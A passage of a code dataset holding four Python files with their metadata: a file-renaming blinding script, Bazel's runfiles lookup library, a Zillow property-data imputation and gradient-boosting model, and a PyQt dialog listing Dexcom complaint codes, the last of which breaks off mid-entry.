\"\"\"\n try:\n if not os.path.exists(folder_name):\n os.mkdir(f\"{folder_name}/\")\n print(f\"Successfully created the folder {folder_name}.\")\n else:\n print(f\"Error: The folder {folder_name} already exists.\")\n except OSError:\n print(f\"Error: Could not create the folder {folder_name}.\")\n\n\ndef remove_folder(folder_name):\n \"\"\" Removes the folder from the current working directory. \"\"\"\n try:\n if not os.path.exists(folder_name):\n print(f\"Error: The folder {folder_name} does not exist.\")\n else:\n os.rmdir(f\"{folder_name}/\")\n print(f\"Successfully deleted the folder {folder_name}.\")\n except OSError:\n print(f\"Error: Could not remove the folder{folder_name}.\")\n\n\ndef copy_files(input_folder, output_folder):\n \"\"\" Parses the files in input_folder alphabetically, renames them based on the convention MCB_ and\n copies the renamed files to output_folder. \"\"\"\n\n input_path = os.path.join(os.getcwd(), input_folder)\n output_path = os.path.join(os.getcwd(), output_folder)\n input_files = os.listdir(input_path)\n index = 1\n output_dir = {}\n\n for filename in sorted(input_files, key=itemgetter(0)):\n if not filename.startswith(\".\"):\n renamed = \"MCB_\" + str(index)\n source = os.path.join(input_path, filename)\n target = os.path.join(output_path, renamed)\n try:\n copyfile(source, target)\n except IOError as e:\n print(f\"Unable to copy file. Error: {e}\")\n sys.exit(1)\n except:\n print(\"Unexpected error:\", sys.exc_info())\n sys.exit(1)\n\n print(f\"\\n File {filename} successfully copied as {renamed}. \\n\")\n output_dir[filename] = renamed\n index += 1\n print(f\"mapping is {output_dir}.\")\n\n with open(\"blinded.csv\", \"w\") as output:\n writer = csv.writer(output)\n for orig, blind in output_dir.items():\n writer.writerow([orig, blind])\n\n\nif __name__ == \"__main__\":\n create_folder(BLINDED_DIR)\n # remove_folder(BLINDED_DIR)\n copy_files(ORIGINAL_DIR, BLINDED_DIR)\n","sub_path":"blind.py","file_name":"blind.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"282040344","text":"# Copyright 2018 The Bazel Authors. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n###############################################################################\n# Vendored in from bazelbuild/bazel (tools/python/runfiles/runfiles.py) at #\n# commit 6c60a8ec049b6b8540c473969dd7bd1dad46acb9 (2019-07-19). See #\n# //python/runfiles:BUILD for details. #\n###############################################################################\n\n\"\"\"Runfiles lookup library for Bazel-built Python binaries and tests.\n\nUSAGE:\n\n1. Depend on this runfiles library from your build rule:\n\n py_binary(\n name = \"my_binary\",\n ...\n deps = [\"@bazel_tools//tools/python/runfiles\"],\n )\n\n2. Import the runfiles library.\n\n from bazel_tools.tools.python.runfiles import runfiles\n\n3. 
Create a Runfiles object and use rlocation to look up runfile paths:\n\n r = runfiles.Create()\n ...\n with open(r.Rlocation(\"my_workspace/path/to/my/data.txt\"), \"r\") as f:\n contents = f.readlines()\n ...\n\n The code above creates a manifest- or directory-based implementations based\n on the environment variables in os.environ. See `Create()` for more info.\n\n If you want to explicitly create a manifest- or directory-based\n implementations, you can do so as follows:\n\n r1 = runfiles.CreateManifestBased(\"path/to/foo.runfiles_manifest\")\n\n r2 = runfiles.CreateDirectoryBased(\"path/to/foo.runfiles/\")\n\n If you want to start subprocesses that also need runfiles, you need to set\n the right environment variables for them:\n\n import subprocess\n from bazel_tools.tools.python.runfiles import runfiles\n\n r = runfiles.Create()\n env = {}\n ...\n env.update(r.EnvVars())\n p = subprocess.Popen([r.Rlocation(\"path/to/binary\")], env, ...)\n\"\"\"\n\nimport os\nimport posixpath\n\nif False:\n # Mypy needs these symbols imported, but since they only exist in python 3.5+,\n # this import may fail at runtime. Luckily mypy can follow this conditional import.\n from typing import Callable, Dict, Optional, Tuple, Union\n\ndef CreateManifestBased(manifest_path):\n # type: (str) -> _Runfiles\n return _Runfiles(_ManifestBased(manifest_path))\n\n\ndef CreateDirectoryBased(runfiles_dir_path):\n # type: (str) -> _Runfiles\n return _Runfiles(_DirectoryBased(runfiles_dir_path))\n\n\ndef Create(env=None):\n # type: (Optional[Dict[str, str]]) -> Optional[_Runfiles]\n \"\"\"Returns a new `Runfiles` instance.\n\n The returned object is either:\n - manifest-based, meaning it looks up runfile paths from a manifest file, or\n - directory-based, meaning it looks up runfile paths under a given directory\n path\n\n If `env` contains \"RUNFILES_MANIFEST_FILE\" with non-empty value, this method\n returns a manifest-based implementation. The object eagerly reads and caches\n the whole manifest file upon instantiation; this may be relevant for\n performance consideration.\n\n Otherwise, if `env` contains \"RUNFILES_DIR\" with non-empty value (checked in\n this priority order), this method returns a directory-based implementation.\n\n If neither cases apply, this method returns null.\n\n Args:\n env: {string: string}; optional; the map of environment variables. If None,\n this function uses the environment variable map of this process.\n Raises:\n IOError: if some IO error occurs.\n \"\"\"\n env_map = os.environ if env is None else env\n manifest = env_map.get(\"RUNFILES_MANIFEST_FILE\")\n if manifest:\n return CreateManifestBased(manifest)\n\n directory = env_map.get(\"RUNFILES_DIR\")\n if directory:\n return CreateDirectoryBased(directory)\n\n return None\n\n\nclass _Runfiles(object):\n \"\"\"Returns the runtime location of runfiles.\n\n Runfiles are data-dependencies of Bazel-built binaries and tests.\n \"\"\"\n\n def __init__(self, strategy):\n # type: (Union[_ManifestBased, _DirectoryBased]) -> None\n self._strategy = strategy\n\n def Rlocation(self, path):\n # type: (str) -> Optional[str]\n \"\"\"Returns the runtime path of a runfile.\n\n Runfiles are data-dependencies of Bazel-built binaries and tests.\n\n The returned path may not be valid. The caller should check the path's\n validity and that the path exists.\n\n The function may return None. 
In that case the caller can be sure that the\n rule does not know about this data-dependency.\n\n Args:\n path: string; runfiles-root-relative path of the runfile\n Returns:\n the path to the runfile, which the caller should check for existence, or\n None if the method doesn't know about this runfile\n Raises:\n TypeError: if `path` is not a string\n ValueError: if `path` is None or empty, or it's absolute or not normalized\n \"\"\"\n if not path:\n raise ValueError()\n if not isinstance(path, str):\n raise TypeError()\n if (\n path.startswith(\"../\")\n or \"/..\" in path\n or path.startswith(\"./\")\n or \"/./\" in path\n or path.endswith(\"/.\")\n or \"//\" in path\n ):\n raise ValueError('path is not normalized: \"%s\"' % path)\n if path[0] == \"\\\\\":\n raise ValueError('path is absolute without a drive letter: \"%s\"' % path)\n if os.path.isabs(path):\n return path\n return self._strategy.RlocationChecked(path)\n\n def EnvVars(self):\n # type: () -> Dict[str, str]\n \"\"\"Returns environment variables for subprocesses.\n\n The caller should set the returned key-value pairs in the environment of\n subprocesses in case those subprocesses are also Bazel-built binaries that\n need to use runfiles.\n\n Returns:\n {string: string}; a dict; keys are environment variable names, values are\n the values for these environment variables\n \"\"\"\n return self._strategy.EnvVars()\n\n\nclass _ManifestBased(object):\n \"\"\"`Runfiles` strategy that parses a runfiles-manifest to look up runfiles.\"\"\"\n\n def __init__(self, path):\n # type: (str) -> None\n if not path:\n raise ValueError()\n if not isinstance(path, str):\n raise TypeError()\n self._path = path\n self._runfiles = _ManifestBased._LoadRunfiles(path)\n\n def RlocationChecked(self, path):\n # type: (str) -> Optional[str]\n return self._runfiles.get(path)\n\n @staticmethod\n def _LoadRunfiles(path):\n # type: (str) -> Dict[str, str]\n \"\"\"Loads the runfiles manifest.\"\"\"\n result = {}\n with open(path, \"r\") as f:\n for line in f:\n line = line.strip()\n if line:\n tokens = line.split(\" \", 1)\n if len(tokens) == 1:\n result[line] = line\n else:\n result[tokens[0]] = tokens[1]\n return result\n\n def _GetRunfilesDir(self):\n # type: () -> str\n if self._path.endswith(\"/MANIFEST\") or self._path.endswith(\"\\\\MANIFEST\"):\n return self._path[: -len(\"/MANIFEST\")]\n elif self._path.endswith(\".runfiles_manifest\"):\n return self._path[: -len(\"_manifest\")]\n else:\n return \"\"\n\n def EnvVars(self):\n # type: () -> Dict[str, str]\n directory = self._GetRunfilesDir()\n return {\n \"RUNFILES_MANIFEST_FILE\": self._path,\n \"RUNFILES_DIR\": directory,\n # TODO(laszlocsomor): remove JAVA_RUNFILES once the Java launcher can\n # pick up RUNFILES_DIR.\n \"JAVA_RUNFILES\": directory,\n }\n\n\nclass _DirectoryBased(object):\n \"\"\"`Runfiles` strategy that appends runfiles paths to the runfiles root.\"\"\"\n\n def __init__(self, path):\n # type: (str) -> None\n if not path:\n raise ValueError()\n if not isinstance(path, str):\n raise TypeError()\n self._runfiles_root = path\n\n def RlocationChecked(self, path):\n # type: (str) -> str\n\n # Use posixpath instead of os.path, because Bazel only creates a runfiles\n # tree on Unix platforms, so `Create()` will only create a directory-based\n # runfiles strategy on those platforms.\n return posixpath.join(self._runfiles_root, path)\n\n def EnvVars(self):\n # type: () -> Dict[str, str]\n return {\n \"RUNFILES_DIR\": self._runfiles_root,\n # TODO(laszlocsomor): remove JAVA_RUNFILES once the 
Java launcher can\n # pick up RUNFILES_DIR.\n \"JAVA_RUNFILES\": self._runfiles_root,\n }\n\n\ndef _PathsFrom(\n argv0, runfiles_mf, runfiles_dir, is_runfiles_manifest, is_runfiles_directory\n):\n # type: (str, str, str, Callable[[str], bool], Callable[[str], bool]) -> Tuple[str, str]\n \"\"\"Discover runfiles manifest and runfiles directory paths.\n\n Args:\n argv0: string; the value of sys.argv[0]\n runfiles_mf: string; the value of the RUNFILES_MANIFEST_FILE environment\n variable\n runfiles_dir: string; the value of the RUNFILES_DIR environment variable\n is_runfiles_manifest: lambda(string):bool; returns true if the argument is\n the path of a runfiles manifest file\n is_runfiles_directory: lambda(string):bool; returns true if the argument is\n the path of a runfiles directory\n\n Returns:\n (string, string) pair, first element is the path to the runfiles manifest,\n second element is the path to the runfiles directory. If the first element\n is non-empty, then is_runfiles_manifest returns true for it. Same goes for\n the second element and is_runfiles_directory respectively. If both elements\n are empty, then this function could not find a manifest or directory for\n which is_runfiles_manifest or is_runfiles_directory returns true.\n \"\"\"\n mf_alid = is_runfiles_manifest(runfiles_mf)\n dir_valid = is_runfiles_directory(runfiles_dir)\n\n if not mf_alid and not dir_valid:\n runfiles_mf = argv0 + \".runfiles/MANIFEST\"\n runfiles_dir = argv0 + \".runfiles\"\n mf_alid = is_runfiles_manifest(runfiles_mf)\n dir_valid = is_runfiles_directory(runfiles_dir)\n if not mf_alid:\n runfiles_mf = argv0 + \".runfiles_manifest\"\n mf_alid = is_runfiles_manifest(runfiles_mf)\n\n if not mf_alid and not dir_valid:\n return (\"\", \"\")\n\n if not mf_alid:\n runfiles_mf = runfiles_dir + \"/MANIFEST\"\n mf_alid = is_runfiles_manifest(runfiles_mf)\n if not mf_alid:\n runfiles_mf = runfiles_dir + \"_manifest\"\n mf_alid = is_runfiles_manifest(runfiles_mf)\n\n if not dir_valid:\n runfiles_dir = runfiles_mf[:-9] # \"_manifest\" or \"/MANIFEST\"\n dir_valid = is_runfiles_directory(runfiles_dir)\n\n return (runfiles_mf if mf_alid else \"\", runfiles_dir if dir_valid else \"\")\n","sub_path":"maistra/vendor/rules_python/python/runfiles/runfiles.py","file_name":"runfiles.py","file_ext":"py","file_size_in_byte":11511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"571836548","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\nimport pandas as pd\nimport numpy as np\nfrom sklearn.grid_search import GridSearchCV\nfrom sklearn.ensemble import GradientBoostingRegressor\nfrom sklearn.preprocessing import StandardScaler\nimport time\n\n\"\"\"\nCreated on Wed Sep 6 19:31:24 2017\n\n@author: jkr\n\"\"\"\n\n\nGB_params={'learning_rate':[0.1, 0.2, 0.5], 'n_estimators':[50, 100, 150, 200], \n 'max_depth':[2, 3, 5, 10]}\nlog_errors=pd.read_csv(\"~/Documents/Machine Learning/Zillow/train_2016_v2.csv\", low_memory=False)\nPredictions=pd.DataFrame(columns=['parcelid', 'prediction', 'month', 'year'])\nstart_time=time.time()\nfor Data in pd.read_csv(\"~/Documents/Machine Learning/Zillow/properties_2016.csv\",\n low_memory=False, chunksize=2*10**5):\n HT_mask=Data.hashottuborspa =='nan'\n Data.loc[HT_mask,'hashottuborspa']=0\n Data.loc[~HT_mask,'hashottuborspa']=1\n \n FP_mask=Data.fireplaceflag == 'nan'\n Data.loc[FP_mask, 'fireplaceflag']=0\n Data.loc[~FP_mask, 'fireplaceflag']=1\n \n TD_mask=Data.taxdelinquencyflag == 'nan'\n Data.loc[TD_mask, 
'taxdelinquencyflag']=0\n Data.loc[~TD_mask, 'taxdelinquencyflag']=1\n ls=list(Data)\n GB_params={'learning_rate':[0.1, 0.2, 0.5], 'n_estimators':[50, 100, 150, 200], \n 'max_depth':[2, 3, 5, 10]}\n for to_predict in ls:\n msk=Data[to_predict].notnull()\n Non_null_data=Data[msk].copy()\n if (len(Non_null_data)>=10) and (to_predict!='propertycountylandusecode'):\n Non_null_data=Non_null_data.apply(pd.to_numeric, args=('coerce',)).fillna(value=0)\n if len(Non_null_data)<100000 and len(Non_null_data)>100:\n int_msk=np.random.rand(len(Non_null_data))<0.4\n train_y=Non_null_data[to_predict][int_msk].copy()\n test_y=Non_null_data[to_predict][~int_msk].copy()\n del Non_null_data[to_predict]\n a=StandardScaler().fit(Non_null_data)\n Non_null_data=pd.DataFrame(a.transform(Non_null_data), columns=list(Non_null_data))\n int_train=Non_null_data[int_msk]\n int_test=Non_null_data[~int_msk]\n GB_CV=GridSearchCV(GradientBoostingRegressor(), GB_params).fit(int_train, train_y)\n score=GB_CV.score(int_test, test_y)\n print(to_predict+\" \"+str(score))\n if score>=0:\n Null_data=Data[~msk].copy()\n del Null_data[to_predict]\n Null_data=Null_data.apply(pd.to_numeric, args=('coerce',)).fillna(value=0)\n Null_data=Null_data.fillna(value=0)\n Null_data=pd.DataFrame(a.transform(Null_data), columns=list(Null_data))\n Imputations=GB_CV.predict(Null_data)\n Data.loc[~msk, to_predict]=Imputations\n Data=Data.apply(pd.to_numeric, args=('coerce',)).fillna(value=0)\n labeled_data=pd.merge(Data, log_errors, how='inner', on='parcelid')\n labeled_data['transactiondate']=pd.to_datetime(labeled_data['transactiondate'])\n labeled_data['month']=labeled_data['transactiondate'].apply(lambda x: x.month)\n labeled_data['year']=labeled_data['transactiondate'].apply(lambda x: x.year)\n del labeled_data['transactiondate']\n # use a single random mask so the train and test sets cannot overlap\n split_msk=np.random.rand(len(labeled_data))<.8\n Train_data=labeled_data[split_msk]\n Test_data=labeled_data[~split_msk]\n Train_y=Train_data['logerror']\n Test_y=Test_data['logerror']\n del Train_data['logerror']\n del Test_data['logerror']\n del Train_data['parcelid']\n del Test_data['parcelid']\n scaler=StandardScaler().fit(Train_data)\n Train_data=pd.DataFrame(scaler.transform(Train_data), columns=list(Train_data))\n Test_data=pd.DataFrame(scaler.transform(Test_data), columns=list(Test_data))\n GB_params={'loss': ['ls', 'lad', 'huber', 'quantile'], 'learning_rate':[0.1, 0.2, 0.5], 'n_estimators':[50, 100, 150, 200], \n 'max_depth':[2, 3, 5, 10]}\n Production_GB=GridSearchCV(GradientBoostingRegressor(), GB_params).fit(Train_data, Train_y)\n score=np.mean(np.abs(Production_GB.predict(Test_data)-Test_y))\n print(\"Validation MAE is \"+str(score))\n Data_IDs=pd.DataFrame(Data['parcelid'])\n del Data['parcelid']\n for month in [10, 11, 12]:\n for year in [2016, 2017]:\n Data_to_concat=Data.copy()\n Data_to_concat['month']=month\n Data_to_concat['year']=year\n Data_to_predict=scaler.transform(Data_to_concat)\n preds=Production_GB.predict(Data_to_predict)\n Data_IDs['prediction']=preds\n Data_IDs['month']=[month]*len(Data_IDs)\n Data_IDs['year']=[year]*len(Data_IDs)\n Predictions=pd.concat([Predictions, Data_IDs])\n \n ","sub_path":"FillingAndPredictiong.py","file_name":"FillingAndPredictiong.py","file_ext":"py","file_size_in_byte":4911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"506749023","text":"import module.common as common\nfrom collections import OrderedDict\n\nfrom PyQt4 import QtCore, QtGui\n\nfrom widget.dialogs.selectClassificationCode.ui.ui_selectClassificationCodeDialog import Ui_selectClassificationCodeDialog\n\nclass SelectClassificationCodeDialog(QtGui.QDialog, Ui_selectClassificationCodeDialog):\n def __init__(self, parent = None):\n super(SelectClassificationCodeDialog, self).__init__(parent)\n\n # Initialize UI\n self.setupUi(self)\n\n # Initialize signals\n self.initialize_signals()\n\n # Initialize data\n self.initialize_data()\n\n def initialize_signals(self):\n self.lineEdit.textChanged.connect(self.on_lineEdit_textChange)\n self.listWidget.currentItemChanged.connect(self.on_listWidget_currentItemChange)\n self.buttonBox.accepted.connect(self.on_buttonBox_accept)\n self.buttonBox.rejected.connect(self.on_buttonBox_reject)\n\n def initialize_data(self):\n self.data = OrderedDict()\n self.data['001 No Initial Calibration'] = 'Complaint'\n self.data['006 Intermittent Antenna Icon'] = 'Complaint'\n self.data['007 Unrecoverable Loss of Antenna Passed Threshold '] = 'Complaint'\n self.data['009 Physical Damage - Applicator '] = 'Complaint'\n self.data['010 Difficulty with Deployment'] = 'Complaint'\n self.data['012 Inaccurate CGM Values'] = 'Complaint'\n self.data['013 ESS Prior to DBD Prompt'] = 'Complaint'\n self.data['017 Broken Receiver Case Clip/General Case Defect'] = 'Complaint'\n self.data['020 Painful Insertion '] = 'Complaint'\n self.data['021 Skin Reaction'] = 'Complaint'\n self.data['022 Discomfort During Use'] = 'Complaint'\n self.data['023 Would Not Accept Calibration'] = 'Complaint'\n self.data['024 Item Missing From Kit'] = 'Complaint'\n self.data['025 Poor Patch Adhesion'] = 'Complaint'\n self.data['028 Receiver Does Not Hold Charge'] = 'Complaint'\n self.data['029 Receiver Will Not Turn On'] = 'Complaint'\n self.data['030 Receiver Operates Only When Connected to Charger'] = 'Complaint'\n self.data['031 Receiver Display Malfunction'] = 'Complaint'\n self.data['032 Cable Difficult to Connect/Remove'] = 'Complaint'\n self.data['036 Physical Damage - Receiver '] = 'Complaint'\n self.data['037 Misc. Firmware'] = 'Complaint'\n self.data['040 Receiver Stuck on Initialization Screen'] = 'Complaint'\n self.data['041 Receiver Will Not Charge'] = 'Complaint'\n self.data['042 ??? 
or Hour Glass Icon in Status Box'] = 'Complaint'\n self.data['045 Other'] = 'Complaint'\n self.data['046 Patch without Adhesive'] = 'Complaint'\n self.data['047 Difficulty Inserting TX Into Sensor Pod'] = 'Complaint'\n self.data['048 Broken Sensor Wire'] = 'Complaint'\n self.data['049 Buttons Do Not Respond'] = 'Complaint'\n self.data['050 Initializing Screen Without Manual Restart'] = 'Complaint'\n self.data['051 No Receiver Display Except Backlight'] = 'Complaint'\n self.data['052 Receiver Vibrating Continuously'] = 'Complaint'\n self.data['053 Screen Display Frozen'] = 'Complaint'\n self.data['056 Insufficient Training'] = 'Complaint'\n self.data['057 CFS Appears Randomly'] = 'Complaint'\n self.data['065 Err1 Cannot Restore \"Enter BG in 1 hour\" is Displayed'] = 'Complaint'\n self.data['066 Err0 Cannot Restore \"Enter BG in 15 min\" is Displayed '] = 'Complaint'\n self.data['067 Err1 at Cal \"Enter BG in 1 hour\" is displayed'] = 'Complaint'\n self.data['068 Err0 at Cal \"Enter BG in 15 minutes\" is displayed'] = 'Complaint'\n self.data['070 Hardware Error '] = 'Complaint'\n self.data['071 Failed Sensor (ESS) after calibration'] = 'Complaint'\n self.data['073 Foreign Object Debris Inside Receiver'] = 'Complaint'\n self.data['075 Bleeding'] = 'Complaint'\n self.data['076 Detached/Missing Sensor Wire'] = 'Complaint'\n self.data['077 Physical Damage - Sensor'] = 'Complaint'\n self.data['079 Receiver Button Flashing'] = 'Complaint'\n self.data['080 Intermittent Audio Output'] = 'Complaint'\n self.data['081 No Vibration'] = 'Complaint'\n self.data['082 Low Audio Output'] = 'Complaint'\n self.data['083 No Audio Output'] = 'Complaint'\n self.data['085 Intermittent Vibration'] = 'Complaint'\n self.data['088 Incorrect Battery Level Indicator'] = 'Complaint'\n self.data['089 Low Transmitter Battery'] = 'Complaint'\n self.data['090 Transmitter Failed error'] = 'Complaint'\n self.data['091 Micro USB door Malfunction'] = 'Complaint'\n self.data['092 Setup Wizard Inactive'] = 'Complaint'\n self.data['093 Manufacturing mode screen displayed'] = 'Complaint'\n self.data['094 Dexcom Website'] = 'Complaint'\n self.data['095 Potential non-reportable complaint'] = 'Complaint'\n self.data['096 Potential reportable event'] = 'Complaint'\n self.data['097 USB Port Dysfunction'] = 'Complaint'\n self.data['098 Choking'] = 'Complaint'\n self.data['099 Buttons Detached'] = 'Complaint'\n self.data['105 Abnormal Transmitter Behavior'] = 'Complaint'\n self.data['106 Overheating Receiver'] = 'Complaint'\n self.data['107 Overheating Accessory'] = 'Complaint'\n self.data['108 Packaging/Labeling'] = 'Complaint'\n self.data['109 Broken Needle/Cannula'] = 'Complaint'\n self.data['110 Detached Needle/Cannula'] = 'Complaint'\n self.data['111 Ceases to Function'] = 'Complaint'\n self.data['112 Calibration error'] = 'Complaint'\n self.data['113 Pairing Failed'] = 'Complaint'\n self.data['113 Pairing Failed'] = 'Complaint'\n self.data['114 Error icon displayed '] = 'Complaint'\n self.data['115 Loss of connection'] = 'Complaint'\n self.data['1502 Bruising'] = 'Complaint'\n self.data['200 Receiver Shield is Torn, Ripped, or Otherwise Damaged'] = 'Complaint'\n self.data['2000 Cradle Failure'] = 'Complaint'\n self.data['2001 Bluetooth Connection Problem '] = 'Complaint'\n self.data['2002 Cradle Blue Light Blinking After Pairing'] = 'Complaint'\n self.data['2004 Cradle Not Charging Receiver'] = 'Complaint'\n self.data['2005 Receiver Undocked From Cradle Due to Receiver Alert Vibration'] = 'Complaint'\n self.data['2006 Receiver USB 
Port/Door Damaged When Docking to Cradle'] = 'Complaint'\n self.data['2009 Receiver Indicates Bluetooth Pairing Unsuccessful'] = 'Complaint'\n self.data['201 Receiver Shield is Melted, Dissolved'] = 'Complaint'\n self.data['2010 Physical Damage -Transmitter'] = 'Complaint'\n self.data['2011 Physical Damage - Accessory'] = 'Complaint'\n self.data['2013 Transmitter Latch Issues'] = 'Complaint'\n self.data['2014 Transmitter Profile Issue'] = 'Complaint'\n self.data['2015 Buttons Hard to Press or Sticking'] = 'Complaint'\n self.data['202 Moisture Under the Receiver Shield'] = 'Complaint'\n self.data['203 Skin Reaction to Tape Adhesive'] = 'Complaint'\n self.data['204 Acoustic Spacer Moved, Detached '] = 'Complaint'\n self.data['205 Shield Pre-Cut Openings are Misaligned'] = 'Complaint'\n self.data['206 Difficulty Reading Receiver LCD Display Because of Shield Tape'] = 'Complaint'\n self.data['207 Receiver Does not Fit in Shield'] = 'Complaint'\n self.data['208 Discoloration of Receiver Shield'] = 'Complaint'\n self.data['209 Audio Alarms Sound Muffled'] = 'Complaint'\n self.data['210 Shield Tape 1 (Triangle Tape) Peeling'] = 'Complaint'\n self.data['211 Shield Tape 2 (Small Tape) Peeling'] = 'Complaint'\n self.data['3000 Blue Tooth Connection between Cradle and Share App'] = 'Complaint'\n self.data['3001 Internet Connection between Share App and Cloud'] = 'Complaint'\n self.data['3002 Share App Interruption Due to IOS Upgrade on Smart Device'] = 'Complaint'\n self.data['3003 Share App Screen Display Frozen'] = 'Complaint'\n self.data['3004 Receiver Icon No Data'] = 'Complaint'\n self.data['3005 Blue Tooth from Receiver issue'] = 'Complaint'\n self.data['3006 Blue Tooth Connection Between Receiver and Share App'] = 'Complaint'\n self.data['3007 Health Kit Feature Issue'] = 'Complaint'\n self.data['3008 Trend Graph Feature Issue'] = 'Complaint'\n self.data['3500 Share Cloud Service Unavailable'] = 'Complaint'\n self.data['4000 Follower App Interruption Due to IOS Upgrade on Smart Device'] = 'Complaint'\n self.data['4001 Follower App not Displaying Any Data (3 dashes)'] = 'Complaint'\n self.data['4002 Follower App not Receiving Notifications'] = 'Complaint'\n self.data['5000 Receiver Could not Communicate with Update Tool'] = 'Complaint'\n self.data['5001 Receiver Detached During Update'] = 'Complaint'\n self.data['5002 Connection Failed During an Update'] = 'Complaint'\n self.data['5003 Issues with Portrait Installation'] = 'Complaint'\n self.data['5004 Issues with Portrait Connectivity'] = 'Complaint'\n self.data['5005 Issues Uploading Receiver'] = 'Complaint'\n self.data['5006 Issues Downloading/Opening the Report'] = 'Complaint'\n self.data['5007 Issues Emailing the Report'] = 'Complaint'\n self.data['5008 Install Failure'] = 'Complaint'\n self.data['5009 Page Load Error'] = 'Complaint'\n self.data['5010 General Connectivity Issues'] = 'Complaint'\n self.data['5011 Clarity Uploader Issues'] = 'Complaint'\n self.data['5012 PATIENT PORTAL: Issues Viewing data report online'] = 'Complaint'\n self.data['5013 CLINIC PORTAL: Issues viewing data online'] = 'Complaint'\n self.data['5014 Issues printing the report'] = 'Complaint'\n self.data['5015 Issues with connectivity'] = 'Complaint'\n self.data['5016 Bluetooth connection between Transmitter and G5 Mobile App Issue'] = 'Complaint'\n self.data['5017 Internet connection between G5 Mobile App and the Cloud Issue'] = 'Complaint'\n self.data['5018 G5 Mobile App interruption due to iOS upgrade on smart device'] = 'Complaint'\n self.data['5019 Adjusting 
Clock message'] = 'Complaint'\n self.data['5020 Available storage on your Iphone is almost full notification'] = 'Complaint'\n self.data['5021 Available storage on your Iphone is full alert'] = 'Complaint'\n self.data['5022 A New version of Dexcom Update tool is available notification'] = 'Complaint'\n self.data['5023 \"Could not find a port for Dexcom receiver\" error message'] = 'Complaint'\n self.data['5024 Unexpected CGM App Shut-Off'] = 'Complaint'\n self.data['5100 Watch shows \"Check Follow App on Your iPhone\"'] = 'Complaint'\n self.data['5101 Watch shows \"Check Share2 App on Your iPhone\"'] = 'Complaint'\n self.data['5102 Watch shows \"---\" Instead of a Glucose Value'] = 'Complaint'\n self.data['5103 Watch is Showing a Red Crossed out iPhone Icon'] = 'Complaint'\n self.data['5104 Watch is not Showing Notifications'] = 'Complaint'\n self.data['5105 Watch is not Showing Notifications Every 5 Minutes'] = 'Complaint'\n self.data['400 Data Entry - Wrong Information Entered in Oracle Database'] = 'Inquiry'\n self.data['401 Billing Error - Patient Billed Incorrect Amount'] = 'Inquiry'\n self.data['402 Shipping Error- Incorrect Shipping Service Used'] = 'Inquiry'\n self.data['403 Fulfillment Error- Pulling/Packing error'] = 'Inquiry'\n self.data['404 Order Entry- Changed Order After Booking, Changes Did Not Take Affect'] = 'Inquiry'\n self.data['405 Lack of Follow Up- Customer expectation Was X, Deliverable Was Y'] = 'Inquiry'\n self.data['406 Distributor - Distributor Error'] = 'Inquiry'\n self.data['407 Phone - Phone system error'] = 'Inquiry'\n self.data['408 Clarity of Process- Proper Expectations Were Not Communicated to Customer'] = 'Inquiry'\n self.data['409 Quoting Error- Incorrect Out of Pocket Costs Provided'] = 'Inquiry'\n self.data['410 Insurance - Coverage Issue'] = 'Inquiry'\n self.data['411 Online Store Issue'] = 'Inquiry'\n self.data['500 Educate: Inserting a Sensor'] = 'Inquiry'\n self.data['501 Educate: Starting a Session'] = 'Inquiry'\n self.data['502 Educate: Stopping a Session'] = 'Inquiry'\n self.data['503 Educate: Setting Time/Date'] = 'Inquiry'\n self.data['504 Educate: Setting High/Low Alerts'] = 'Inquiry'\n self.data['505 Educate: Snoozing Feature'] = 'Inquiry'\n self.data['506 Educate: Setting Rise and Fall Rate Alerts'] = 'Inquiry'\n self.data['507 Educate: Setting Other Alerts'] = 'Inquiry'\n self.data['508 Educate: Setting Out of Range Alert'] = 'Inquiry'\n self.data['509 Educate: Entering TX ID Into Receiver'] = 'Inquiry'\n self.data['510 Educate: Entering a BG Value'] = 'Inquiry'\n self.data['512 Educate: Entering Events'] = 'Inquiry'\n self.data['513 Educate: Exporting Data From DM'] = 'Inquiry'\n self.data['514 Educate: Send Data to TS'] = 'Inquiry'\n self.data['515 Educate: Alert Clarification (Questions About How The Alerts Work)'] = 'Inquiry'\n self.data['516 Educate: When ERR1 is Displayed'] = 'Inquiry'\n self.data['517 Educate: When ERR0 is Displayed'] = 'Inquiry'\n self.data['518 Educate: When ??? 
Icon is Displayed in Status Box For Less Than 1 hour'] = 'Inquiry'\n self.data['519 Educate: With \"R2 Not Found\" Error in DM SW'] = 'Inquiry'\n self.data['520 Need Help Finding TX in Seven Plus Kit'] = 'Inquiry'\n self.data['521 Educate: Help With General Use of System'] = 'Inquiry'\n self.data['522 Educate: Receiver That Won\\'t Turn On'] = 'Inquiry'\n self.data['523 Need Help Installing DM Software'] = 'Inquiry'\n self.data['524 Need Help With General Use of DM Software'] = 'Inquiry'\n self.data['525 Need Help Printing DM Graphs'] = 'Inquiry'\n self.data['526 Educate: Setting Up Receiver For First Time'] = 'Inquiry'\n self.data['527 Educate: Antenna Icon is Displayed in Status Box For Less Than 15 Minutes'] = 'Inquiry'\n self.data['529 Educate: System Recovery Check'] = 'Inquiry'\n self.data['530 Request For Easier Insertion Process'] = 'Inquiry'\n self.data['600 Request to Merge Patient Data (R2 SNs) in DM SW'] = 'Inquiry'\n self.data['602 Request For MAC Compatibility'] = 'Inquiry'\n self.data['603 Request For USB/PC Charger For R2'] = 'Inquiry'\n self.data['604 Request For a Sensor Replacement Since PT Had a R2 Failure'] = 'Inquiry'\n self.data['605 Request For a Sensor Replacement Since PT Had a TX Failure'] = 'Inquiry'\n self.data['606 Request For Beep and Vibe Alert Feature'] = 'Inquiry'\n self.data['607 Request For Changes/Improvements on Sensor'] = 'Inquiry'\n self.data['608 Request For Changes/Improvements on Receiver'] = 'Inquiry'\n self.data['609 Request For Changes/Improvements on Transmitter'] = 'Inquiry'\n self.data['610 Request For Changes/Improvements on System'] = 'Inquiry'\n self.data['611 Request For Copy of IFU 